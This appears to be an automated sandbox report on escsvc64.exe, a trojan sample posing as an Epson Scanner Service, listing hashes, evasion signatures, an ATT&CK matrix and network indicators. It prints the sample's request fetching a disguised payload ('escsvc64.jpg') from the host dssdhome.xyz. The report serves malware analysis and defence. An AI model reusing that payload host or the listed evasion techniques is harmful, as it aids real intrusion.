Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
escsvc64.exe

Overview

General Information

Sample name:escsvc64.exe
Analysis ID:1590615
MD5:525ea9523a2afe76d2eaebc4a6b923eb
SHA1:e0e30f49e82505caf9e7852a1071bbce81d8fcdc
SHA256:53c772ca6258ee6a1d53be5e66554d0793f92c631760f1e3ed31366ef4fccba7
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Performs DNS queries to domains with low reputation
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to get notified if a device is plugged in / out
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • escsvc64.exe (PID: 7440 cmdline: "C:\Users\user\Desktop\escsvc64.exe" MD5: 525EA9523A2AFE76D2EAEBC4A6B923EB)
    • WerFault.exe (PID: 7556 cmdline: C:\Windows\system32\WerFault.exe -u -p 7440 -s 420 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-14T11:21:00.415789+010020283713Unknown Traffic192.168.2.449733169.150.247.36443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: escsvc64.exeVirustotal: Detection: 6%Perma Link
Source: unknownHTTPS traffic detected: 169.150.247.36:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: Binary string: d:\PROJECTS\ESCSVC\ESCSVC_DEV\x64\Release\EscSvc64.pdb! source: escsvc64.exe
Source: Binary string: C:\Users\Administrator\source\repos\Dll1\x64\Release\Dll1.pdb source: escsvc64.exe, escsvc64.exe, 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000002.1861709002.0000000180012000.00000002.00001000.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000002.1861552886.0000000002700000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\PROJECTS\ESCSVC\ESCSVC_DEV\x64\Release\EscSvc64.pdb source: escsvc64.exe
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140001460 CreateEventW,CreateEventW,RegisterDeviceNotificationW,SetServiceStatus,WaitForMultipleObjects,UnregisterDeviceNotification,CloseHandle,CloseHandle,0_2_0000000140001460
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]0_2_0000000140003FEC
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]0_2_000000014000420E
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]0_2_0000000140004012
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 4x nop then mov rcx, qword ptr [rbx]0_2_0000000140001080
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]0_2_00000001400040A9
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]0_2_0000000140004112
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 4x nop then mov rax, qword ptr [rsp+78h]0_2_000000014000438B
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 4x nop then or byte ptr [rax-01h], 00000008h0_2_0000000140005390

Networking

barindex
Source: DNS query: www.dssdhome.xyz
Source: Joe Sandbox ViewIP Address: 169.150.247.36 169.150.247.36
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 169.150.247.36:443
Source: global trafficHTTP traffic detected: GET /11/xin/escsvc64.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Linux i644 ; en-US) Gecko/20100101 Firefox/70.2Host: www.dssdhome.xyz
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /11/xin/escsvc64.jpg HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Linux i644 ; en-US) Gecko/20100101 Firefox/70.2Host: www.dssdhome.xyz
Source: global trafficDNS traffic detected: DNS query: www.dssdhome.xyz
Source: escsvc64.exe, 00000000.00000002.1859925957.00000000004FD000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1712742415.0000000000514000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
Source: Amcache.hve.3.drString found in binary or memory: http://upx.sf.net
Source: escsvc64.exe, 00000000.00000002.1859925957.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1712742415.00000000004C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dssdhome.xyz/
Source: escsvc64.exe, 00000000.00000002.1859925957.000000000049B000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1712742415.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dssdhome.xyz/11/xin/escsvc64.jpg
Source: escsvc64.exe, 00000000.00000002.1859925957.00000000004EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dssdhome.xyz/11/xin/escsvc64.jpg.
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownHTTPS traffic detected: 169.150.247.36:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140001890 OpenSCManagerW,OpenServiceW,ControlService,Sleep,QueryServiceStatus,Sleep,QueryServiceStatus,DeleteService,CloseServiceHandle,CloseServiceHandle,0_2_0000000140001890
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_000000014000F2100_2_000000014000F210
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_000000014000EA400_2_000000014000EA40
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_000000014000BE400_2_000000014000BE40
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_00000001400030400_2_0000000140003040
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140008E500_2_0000000140008E50
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_00000001400074500_2_0000000140007450
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_00000001400014600_2_0000000140001460
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_00000001400096600_2_0000000140009660
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_000000014000C4600_2_000000014000C460
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140001C900_2_0000000140001C90
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_00000001400020900_2_0000000140002090
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_000000014000DCB00_2_000000014000DCB0
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140008D000_2_0000000140008D00
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_000000014000B7C00_2_000000014000B7C0
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_004500400_2_00450040
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_004514F80_2_004514F8
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_004511A80_2_004511A8
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0045A2300_2_0045A230
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_00000001800015D00_2_00000001800015D0
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_00000001800012800_2_0000000180001280
Source: C:\Users\user\Desktop\escsvc64.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7440 -s 420
Source: escsvc64.exeStatic PE information: invalid certificate
Source: escsvc64.exeBinary or memory string: OriginalFilename vs escsvc64.exe
Source: classification engineClassification label: mal52.troj.winEXE@2/5@1/1
Source: C:\Users\user\Desktop\escsvc64.exeCode function: GetModuleFileNameW,OpenSCManagerW,CreateServiceW,CloseServiceHandle,CloseServiceHandle,0_2_0000000140001620
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_00000001400024A0 Sleep,CoInitialize,CoCreateInstance,Sleep,CoUninitialize,0_2_00000001400024A0
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140001080 GetCommandLineW,CommandLineToArgvW,LocalFree,StartServiceCtrlDispatcherW,GetLastError,0_2_0000000140001080
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140001080 GetCommandLineW,CommandLineToArgvW,LocalFree,StartServiceCtrlDispatcherW,GetLastError,0_2_0000000140001080
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000180001C10 StartServiceCtrlDispatcherW,0_2_0000000180001C10
Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7440
Source: C:\Windows\System32\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\58de44fc-63f4-47f5-920f-ed4301cdf88aJump to behavior
Source: escsvc64.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\escsvc64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: escsvc64.exeVirustotal: Detection: 6%
Source: escsvc64.exeString found in binary or memory: /INSTALL
Source: escsvc64.exeString found in binary or memory: /INSTALL/START/REMOVEEpsonScanSvcEpson Scanner ServiceSOFTWARE\WOW6432Node\EPSON\EPSON ScanSupported,SOFTWARE\WOW6432Node\EPSON\EPSON Scan\%sEventNumEventAppNameEventAppPath%s,%dWIN_DIR1%s\%sPROGx86_DIR0ProgramFiles(x86)PROG_DIR<unknown>EsDevApp.exeRSDSV
Source: unknownProcess created: C:\Users\user\Desktop\escsvc64.exe "C:\Users\user\Desktop\escsvc64.exe"
Source: C:\Users\user\Desktop\escsvc64.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7440 -s 420
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: webio.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeSection loaded: userenv.dllJump to behavior
Source: escsvc64.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: escsvc64.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\PROJECTS\ESCSVC\ESCSVC_DEV\x64\Release\EscSvc64.pdb! source: escsvc64.exe
Source: Binary string: C:\Users\Administrator\source\repos\Dll1\x64\Release\Dll1.pdb source: escsvc64.exe, escsvc64.exe, 00000000.00000002.1859886425.0000000000450000.00000040.00001000.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000002.1861709002.0000000180012000.00000002.00001000.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000002.1861552886.0000000002700000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\PROJECTS\ESCSVC\ESCSVC_DEV\x64\Release\EscSvc64.pdb source: escsvc64.exe
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_000000014000CF60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000000014000CF60
Source: escsvc64.exeStatic PE information: real checksum: 0x28b76 should be: 0x2d375
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_00000001400079EC push rdx; ret 0_2_0000000140007A01
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140007BFA push rdx; ret 0_2_0000000140007C01
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140007AE7 push rdx; ret 0_2_0000000140007AF1
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140007976 push rdx; ret 0_2_00000001400079C9
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140007B77 push rdx; ret 0_2_0000000140007B79
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_00468086 push ecx; retf 003Fh0_2_004680E6
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140001080 GetCommandLineW,CommandLineToArgvW,LocalFree,StartServiceCtrlDispatcherW,GetLastError,0_2_0000000140001080
Source: C:\Users\user\Desktop\escsvc64.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-18716
Source: C:\Users\user\Desktop\escsvc64.exeAPI coverage: 7.0 %
Source: C:\Users\user\Desktop\escsvc64.exe TID: 7456Thread sleep time: -30000s >= -30000sJump to behavior
Source: Amcache.hve.3.drBinary or memory string: VMware
Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: escsvc64.exe, 00000000.00000002.1859925957.00000000004FD000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000002.1859925957.000000000049B000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1712742415.00000000004FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.3.drBinary or memory string: vmci.sys
Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
Source: escsvc64.exe, 00000000.00000002.1859925957.00000000004FD000.00000004.00000020.00020000.00000000.sdmp, escsvc64.exe, 00000000.00000003.1712742415.00000000004FD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH`
Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.3.drBinary or memory string: VMware20,1
Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\escsvc64.exeAPI call chain: ExitProcess graph end nodegraph_0-18717
Source: C:\Users\user\Desktop\escsvc64.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140004A40 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0000000140004A40
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_000000014000CF60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_000000014000CF60
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_00000001400032A0 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00000001400032A0
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140004A40 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0000000140004A40
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140004AE0 RtlCaptureContext,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0000000140004AE0
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_000000014000E7D0 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_000000014000E7D0
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140002BE0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0000000140002BE0
Source: C:\Users\user\Desktop\escsvc64.exeCode function: GetLocaleInfoA,0_2_000000014000DF90
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_0000000140008860 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0000000140008860
Source: C:\Users\user\Desktop\escsvc64.exeCode function: 0_2_00000001400032A0 GetStartupInfoW,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00000001400032A0
Source: C:\Users\user\Desktop\escsvc64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter
14
Windows Service
14
Windows Service
2
Virtualization/Sandbox Evasion
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Service Execution
1
DLL Side-Loading
1
Process Injection
1
Process Injection
LSASS Memory1
Query Registry
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Native API
Logon Script (Windows)1
DLL Side-Loading
2
Obfuscated Files or Information
Security Account Manager41
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS2
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
Peripheral Device Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials14
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
